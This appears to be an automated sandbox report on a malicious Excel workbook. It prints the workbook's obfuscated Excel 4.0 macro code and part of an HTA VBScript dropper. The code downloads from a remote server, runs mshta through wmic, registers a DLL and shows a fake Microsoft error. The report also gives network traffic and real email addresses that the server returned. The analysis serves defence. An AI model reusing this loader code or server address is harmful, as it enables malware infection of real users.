                    Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >..b_O_x_v_m_y_N_V_Y_i_J_b_r_e_a_f_U = Chr(114+1-1) & "und" & "ll3" & "2." & Chr(101+1-1) & "" & "xe " & "C:\" & "" & "" & "\Pr" & "ogr" & "amD" & "ata" & "\l" & Chr(119+1-1) & "nig" & "ge" & "r." & "bi" & "n " & "Dll" & Chr(82+1-1) & Chr(101+1-1) & Chr(103+1-1) & Chr(105+1-1) & "st" & "" & "erS" & "erv" & "er"..Set z_O_z_o_M_R_s = CreateObject("MSX" & Chr(77+1-1) & "L2" & Chr(46+1-1) & "Ser" & "ve" & "rX" & "" & "" & "MLH" & "TT" & "" & "P.6" & Chr(46+1-1) & Chr(48+1-1))....w_V_r_f_C_M_E_x = "Wsc" & Chr(114+1-1) & "" & Chr(105+1-1) & "" & "pt." & "" & "She" & "ll"..Set b_I_y_E_S_v_t = CreateObject(w_V_r_f_C_M_E_x)..a_e_c_h_A_z_A = LCase(b_I_y_E_S_v_t.expandenvironmentstrings("%USERDOMAIN%"))..o_L_I_A_k_q_M_G_N_c_H_h_E_z =LCase(Replace(b_I_y_E
                    C:\ProgramData\hgcwdJhz.txt
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):131
                    Entropy (8bit):4.3648913092077555
                    Encrypted:false
                    SSDEEP:3:YEKMChMqR2OLGTaH/iMVOcALAlLgZAMdi/RgyKIMELC2HY:YEKM3M2kGTm+2g7i//KIxn4
                    MD5:5278441B81EB2C864F606BBEF0F86A37
                    SHA1:2212E712E31250B891F90FF790DB774DA3AE6EB4
                    SHA-256:377A0FD46D6CDCDE8220D882AE1990BB5EE42473F9ADCE1EA8DFDE380B8E545B
                    SHA-512:85576DF4A8C578B407CE0B77153A0655B4F6D52F569A49101CBC8580CE7D4663CAEAB33E0EC32BA5540732B9E0DE76C07359053826251B3BBF3C10453A64E408
                    Malicious:false
                    Reputation:low
                    Preview: {"archie.hopkins@lakelandenergy.com","agallego@enequipo.es","mbrent@moorelandscapes.com","inatal@bds.org","amoran@austinmoran.com"}
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG[1].txt
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:ASCII text, with no line terminators
                    Category:downloaded
                    Size (bytes):131
                    Entropy (8bit):4.3648913092077555
                    Encrypted:false
                    SSDEEP:3:YEKMChMqR2OLGTaH/iMVOcALAlLgZAMdi/RgyKIMELC2HY:YEKM3M2kGTm+2g7i//KIxn4
                    MD5:5278441B81EB2C864F606BBEF0F86A37
                    SHA1:2212E712E31250B891F90FF790DB774DA3AE6EB4
                    SHA-256:377A0FD46D6CDCDE8220D882AE1990BB5EE42473F9ADCE1EA8DFDE380B8E545B
                    SHA-512:85576DF4A8C578B407CE0B77153A0655B4F6D52F569A49101CBC8580CE7D4663CAEAB33E0EC32BA5540732B9E0DE76C07359053826251B3BBF3C10453A64E408
                    Malicious:false
                    Reputation:low
                    IE Cache URL:http://139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    Preview: {"archie.hopkins@lakelandenergy.com","agallego@enequipo.es","mbrent@moorelandscapes.com","inatal@bds.org","amoran@austinmoran.com"}
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70DEA7D3.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 286 x 48, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):2200
                    Entropy (8bit):7.860501688375939
                    Encrypted:false
                    SSDEEP:48:eB4tDhUKfyMhSkT7wudfivzzawE7y2aXihs+HjVVRsYr1n7onlfDq:Q4tDhUKfyMhBT7wefivnjEWPyhJHjvR5
                    MD5:98EB9B539D097395BD1873A5BEF2589B
                    SHA1:988221B31FB352A522DFC014CBBFC6A21902A93F
                    SHA-256:8F04C4200AEFEE50FB52F399400D73284AF6004A49DFC343183F4C87CD9C2C5D
                    SHA-512:340E6C1B3A6123B75686034AAADAD19033929A3EC08024CAA46D95CB205A36A98A761AA70A356065237624B61CCEC4B07042F5DDE35D628770E4B304D3679406
                    Malicious:false
                    Reputation:low
                    Preview: .PNG........IHDR.......0.....Hz.s..._IDATx...{PT.....>\.]V......D0........j...hl..<l..iu.8q.D..5..X...Lg..1>..P.T@V.(JW.."....<..?.z.Yvq.<...>............DG..@.y...{.....h...E...(Z.pA."....!\P...E...-B..h...E...(Z.pA."....!\P...E...-B..h...E....<:...5Y9.._^.Vr\..:!%.."....[.QK.....V.)<...._...[[..M....9.j_[.tp.;4b........2......f.........K....".~.s/i.r...WOc.....{.b5.s...Y...+.t.>....w......m.N.v....3y......._<.Y..r..i"M..........>..~......V...Ya.....Q...;....S.....2....YA.P..Lb..I"....L....-.>R..l.r.X.\....$$......u........G.D/\.y.P>":.1......._xe..Bi.j.}.....v} OM.:..j=q.... *w.H".....i......uc....^[......mA~Q.x.......J.!..{...".s.&....N...B.=i.r..| ......?..^:?....d........j.-./.Q.....u......==..h..g$W...m..."vt..g..s.i.0f.....w.}......g..X.F.o4....[.m..da.a..Xe.X........:;...g_..|s.."..X..a7w...n.47..IH.(..B..d.....k.....:q2..TS..l...b.+o.4.......q..M-G.`...r...1wY.z.....QV#...3...V}i.n.Y....@..xZ.F.H"I..G.y..'e3f..`5..]
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5C797B8.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 237 x 336, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):60538
                    Entropy (8bit):7.970149181563435
                    Encrypted:false
                    SSDEEP:1536:2PFFxgFzx5YVqHS2YzayhpSW4vHR05Q4r5UZKUbD:RFzIsj8aipSW4vHREQ4iZKUbD
                    MD5:ABC5AD9147D307B1DADB93C7AF297C5A
                    SHA1:3658C7DDFA698CDADD1D24C6C8DC4ECF7A09D9E3
                    SHA-256:AEF2CEDE45970E5F0DCC40514D38B0D707A87FBC5943B61763EF20B4A8C0573F
                    SHA-512:D6F7C18AB4E132EAA0620FD83F7EE6C21F2B16ECA70267770C6F8499B18DEE24B3849E9ADDFAA76DA1A4CB13BDB81F1F49DF77CC3BF0146EE68E0CE6860839AA
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: .PNG........IHDR.......P.....Sn.....JiCCPICC Profile..x..W.TS...[RIh..H...R.K..E..*..I ...D....]D@].U.E...ZQ...]......l..I.]=...s........{g...I.....y.|Y|D.kBj.......Z...x|...........7..../.(......'.... q.g...<......|..>Po=#_.. 6...!.*q...(q..W.l..9....L..dY.h7C=....y.o@.*..%..!..x..#!...7M...p...'....C.<^..V..r.X.....?..%/W1...6.H.......F.(%.A.#...X..wb...b.*RD&..QS...k.....x.Q..B......32..\...A....D..EByX...F6->v.g.8l....L.Wi.R.............D.).1j.89.bm...(..fS$.........m ..J"B...LYx..^.'...[$.sc4.*_........7..Y(a'.......s..C..c...$M.X.4?$^3..47Nc.S...J......\<0..H5?.#.KT.gd......A4..P....2.4....=M=.z$....d.!p.h.g..F$...._...|h^.jT.....V.t..........<..r.o.j.d.[2x.5...a...)...&Z.Q..t.-.a.Pb$1.....?.......>..`._..........N...b.7...8..=.kr..:g...z.!x...8.7...h..A.P..D...[....U.5v.W.J.F..8|;S.I.s.EY.+..5c.....o.s.....Q.Zb..}X.v.;.....;.5c..J<....V..xU<9.G..?....r.z.n..|a....8.3e.,Q>....B.W..9........;.~M.b.......]q............8........Z..
                    C:\Users\user\AppData\Local\Temp\57FF.tmp
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Microsoft Excel 2007+
                    Category:dropped
                    Size (bytes):91252
                    Entropy (8bit):7.9093007405805285
                    Encrypted:false
                    SSDEEP:1536:lYEilnbn7bPFFxgFzx5YVqHS2YzayhpSW4vHR05Q4r5UZKUbYWOdO:lYDbyFzIsj8aipSW4vHREQ4iZKUbYWOQ
                    MD5:AD9FF20DDE29ED2817FF306956445AE9
                    SHA1:54EF5B5E08178A16E72EDEFE27973F12652506BD
                    SHA-256:4FA5BDE971A58FF18EC69BB4F4A61416A8C839550D92A3544866EE84FA3C73EB
                    SHA-512:C2867BAFD01E0C09EF6335D6C74F89F4A5CDD8EB3284CAC8987D5262806F018694A9D0670D07D40EA556D3ED30C94430CC9E80E4A8473E6233ED75D1C393F00E
                    Malicious:false
                    Reputation:low
                    Preview: PK..........!.?...............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.n.0....?..."......C..=....=3..&...L".}....`.Vr......W.........;6.3.WA.....o.'.`.^K.<tl.....-...!..mr...@..'....vV!9..5.E..A.A\.f...>..m.1.r..V.....]&.....B.1..5JfJT<y....+..7...@.-wR.p....DR.q2~..A|.J~e.4"...d..K..^3'dM.7&..2..C.9.y..E.JFCs+S.).9#z+.....z..GF...?..v.....^C?..p...G..Czx..#.2....;E....^.$.CEF.d:. .u..........(.A=::...9..3..yk...C..=&CS'...i...._...0&..6..|.~$1..s.h..v....<.j...fq..%=...n#.....
                    C:\Users\user\Desktop\~$payment 435975469.xlsb
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):165
                    Entropy (8bit):1.4377382811115937
                    Encrypted:false
                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                    MD5:797869BB881CFBCDAC2064F92B26E46F
                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                    Static File Info

                    General

                    File type:Microsoft Excel 2007+
                    Entropy (8bit):7.910082269729894
                    TrID:
                    • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
                    • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                    • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                    • ZIP compressed archive (8000/1) 5.73%
                    File name:payment 435975469.xlsb
                    File size:91467
                    MD5:751e07abc0bc08abf349a49fd8c81703
                    SHA1:ad977311af2765089b9bffb5bb03cb26c6ab874c
                    SHA256:595c56c71c91c470c05c6243e46835d1b25b15c247fcd2a025ef0369e6a6b798
                    SHA512:d1034eb70912240df56516fb475934dbfe1f3e0e3e66399aca8537a3f38aedd09b85774a1926094c57cf1bf021ea53c039fd8854900c67ec6e8290e1dfb8ba8d
                    SSDEEP:1536:UWgPFFxgFzx5YVqHS2YzayhpSW4vHR05Q4r5UZKUb9dsyn/fKnWFMnfy3n7Vgdx:V7FzIsj8aipSW4vHREQ4iZKUb9myn6nH
                    File Content Preview:PK..........!...l.....W.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                    File Icon

                    Icon Hash:e4e2ea8aa4b4b4b4

                    Static OLE Info

                    General

                    Document Type:OpenXML
                    Number of OLE Files:1

                    OLE File "payment 435975469.xlsb"

                    Indicators

                    Has Summary Info:
                    Application Name:
                    Encrypted Document:
                    Contains Word Document Stream:
                    Contains Workbook/Book Stream:
                    Contains PowerPoint Document Stream:
                    Contains Visio Document Stream:
                    Contains ObjectPool Stream:
                    Flash Objects Count:
                    Contains VBA Macros:

                    Macro 4.0 Code

                    0,564,=FOPEN(CHAR(67) & ":\P" & CHAR(114) & "ogr" & CHAR(97) & "mData\EYCmM" & CHAR(89) & "HJOyR." & CHAR(114) & CHAR(116) & CHAR(102), 3)
                    1,564,=B7395+C9724
                    6,564,=D3413+C656
                    7,564,=B2229+C8325
                    8,564,=B9859+C4188
                    11,564,=B783+D7448
                    12,564,=D4479+D8289
                    13,564,=FOR.CELL("MeWufVIEyMSe",Sheet1!BV165:CH519, TRUE)
                    15,564,=D6867+D4507
                    16,564,=B942+C4505
                    20,564,=D2890+D6039
                    21,564,=C1812+C2969
                    22,564,=D2446+D4508
                    24,564,=B9204+B844
                    26,564,=D7498+B7358
                    27,564,=FWRITE(0,CHAR(MeWufVIEyMSe))
                    29,564,=B3493+A8819
                    31,564,=C2687+A1120
                    32,564,=A7564+C4159
                    36,564,=A9988+D5337
                    37,564,=C7631+B8648
                    38,564,=D3212+B7834
                    41,564,=NEXT()
                    52,564,=B5371+B2151
                    53,564,=EXEC("wmic proces" & CHAR(115) & " ca" & CHAR(108) & "l creat" & CHAR(101) & "" & CHAR(32) & CHAR(34) & "" & CHAR(109) & CHAR(115) & CHAR(104) & "ta " & CHAR(67) & ":\ProgramData\EYCmMYHJ" & CHAR(79) & "yR" & CHAR(46) & "rt" & CHAR(102) & "" & CHAR(34))
                    54,564,=C581+C2472
                    55,564,=B2677+C6794
                    56,564,=C2578+B5151
                    59,564,=D4802+D4315
                    62,564,=C6596+D2280
                    63,564,=D2636+D4942
                    65,564,=CALL("url" & CHAR(109) & "on", "URLDownl" & CHAR(111) & "ad" & CHAR(84) & CHAR(111) & "FileA","JJCCJ" & CHAR(74), 0, "ht" & CHAR(116) & "p://1" & CHAR(51) & "9.5" & CHAR(57) & ".6" & CHAR(52) & CHAR(46) & CHAR(49) & "95:8080/Q" & CHAR(50) & "W5" & CHAR(86) & "WUFL5" & CHAR(86) & "CMQ" & CHAR(55) & CHAR(74) & "QPETG" & CHAR(51) & CHAR(67) & CHAR(67) & "TYX72Z4R25PDG", "C:\" & CHAR(80) & "rogramData\hgcwdJhz.tx" & CHAR(116),0,0)
                    66,564,=D2676+B2127
                    67,564,=C4790+D5629
                    71,564,=D2604+A6179
                    72,564,=D4542+D8306
                    76,564,=D9056+B4534
                    77,564,=ALERT("Error!" & CHAR(32) & "Sending r" & CHAR(101) & "po" & CHAR(114) & "t to M" & CHAR(105) & "crosoft.." & CHAR(46) & "")
                    79,564,=D4868+D2331
                    80,564,=B3174+B5181
                    83,564,=D9547+A5597
                    84,564,=B8801+D8551
                    85,564,=B9247+C1043
                    87,564,=D8176+A7956
                    89,564,=B4481+A1657
                    90,564,=FOPEN(CHAR(67) & ":\Program" & CHAR(68) & CHAR(97) & "ta\hgcw" & CHAR(100) & CHAR(74) & CHAR(104) & CHAR(122) & CHAR(46) & "" & CHAR(116) & "xt",1)
                    91,564,=C2502+B3661
                    93,564,=D5591+A6932
                    94,564,=C9224+A4459
                    95,564,=A7276+B8809
                    96,564,=C8611+B788
                    97,564,=B6334+C9145
                    98,564,=B2681+B41
                    102,564,=C175+B8798
                    104,564,=D1443+A8250
                    105,564,=SEND.MAIL(EVALUATE(FREAD(US91,255)))
                    107,564,=B2268+D9660
                    110,564,=D5638+A4105
                    111,564,=B2152+C4163
                    112,564,=C2143+D1006
                    114,564,=B1216+C7027
                    115,564,=RETURN()
                    

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Nov 24, 2021 17:50:33.949981928 CET491678080192.168.2.22139.59.64.195
                    Nov 24, 2021 17:50:34.114958048 CET808049167139.59.64.195192.168.2.22
                    Nov 24, 2021 17:50:34.115071058 CET491678080192.168.2.22139.59.64.195
                    Nov 24, 2021 17:50:34.115684032 CET491678080192.168.2.22139.59.64.195
                    Nov 24, 2021 17:50:34.280561924 CET808049167139.59.64.195192.168.2.22
                    Nov 24, 2021 17:50:34.592226028 CET808049167139.59.64.195192.168.2.22
                    Nov 24, 2021 17:50:34.592341900 CET491678080192.168.2.22139.59.64.195
                    Nov 24, 2021 17:51:49.594012022 CET808049167139.59.64.195192.168.2.22
                    Nov 24, 2021 17:51:49.597973108 CET491678080192.168.2.22139.59.64.195

                    HTTP Request Dependency Graph

                    • 139.59.64.195:8080

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.2249167139.59.64.1958080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2021 17:50:34.115684032 CET0OUTGET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1
                    Accept: */*
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: 139.59.64.195:8080
                    Connection: Keep-Alive
                    Nov 24, 2021 17:50:34.592226028 CET0INHTTP/1.1 200 OK
                    Server: nginx/1.0.15
                    Date: Wed, 24 Nov 2021 16:50:33 GMT
                    Content-Type: text/plain; charset=utf-8
                    Connection: keep-alive
                    Content-Length: 131
                    Data Raw: 7b 22 61 72 63 68 69 65 2e 68 6f 70 6b 69 6e 73 40 6c 61 6b 65 6c 61 6e 64 65 6e 65 72 67 79 2e 63 6f 6d 22 2c 22 61 67 61 6c 6c 65 67 6f 40 65 6e 65 71 75 69 70 6f 2e 65 73 22 2c 22 6d 62 72 65 6e 74 40 6d 6f 6f 72 65 6c 61 6e 64 73 63 61 70 65 73 2e 63 6f 6d 22 2c 22 69 6e 61 74 61 6c 40 62 64 73 2e 6f 72 67 22 2c 22 61 6d 6f 72 61 6e 40 61 75 73 74 69 6e 6d 6f 72 61 6e 2e 63 6f 6d 22 7d
                    Data Ascii: {"archie.hopkins@lakelandenergy.com","agallego@enequipo.es","mbrent@moorelandscapes.com","inatal@bds.org","amoran@austinmoran.com"}


                    Code Manipulations

                    Statistics

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Start time:17:49:22
                    Start date:24/11/2021
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Imagebase:0x13f990000
                    File size:28253536 bytes
                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:17:49:45
                    Start date:24/11/2021
                    Path:C:\Windows\System32\wbem\WMIC.exe
                    Wow64 process (32bit):false
                    Commandline:wmic process call create "mshta C:\ProgramData\EYCmMYHJOyR.rtf"
                    Imagebase:0xff1f0000
                    File size:566272 bytes
                    MD5 hash:FD902835DEAEF4091799287736F3A028
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    General

                    Start time:17:49:46
                    Start date:24/11/2021
                    Path:C:\Windows\System32\mshta.exe
                    Wow64 process (32bit):false
                    Commandline:mshta C:\ProgramData\EYCmMYHJOyR.rtf
                    Imagebase:0x13f2d0000
                    File size:13824 bytes
                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    Code Analysis

                    Reset < >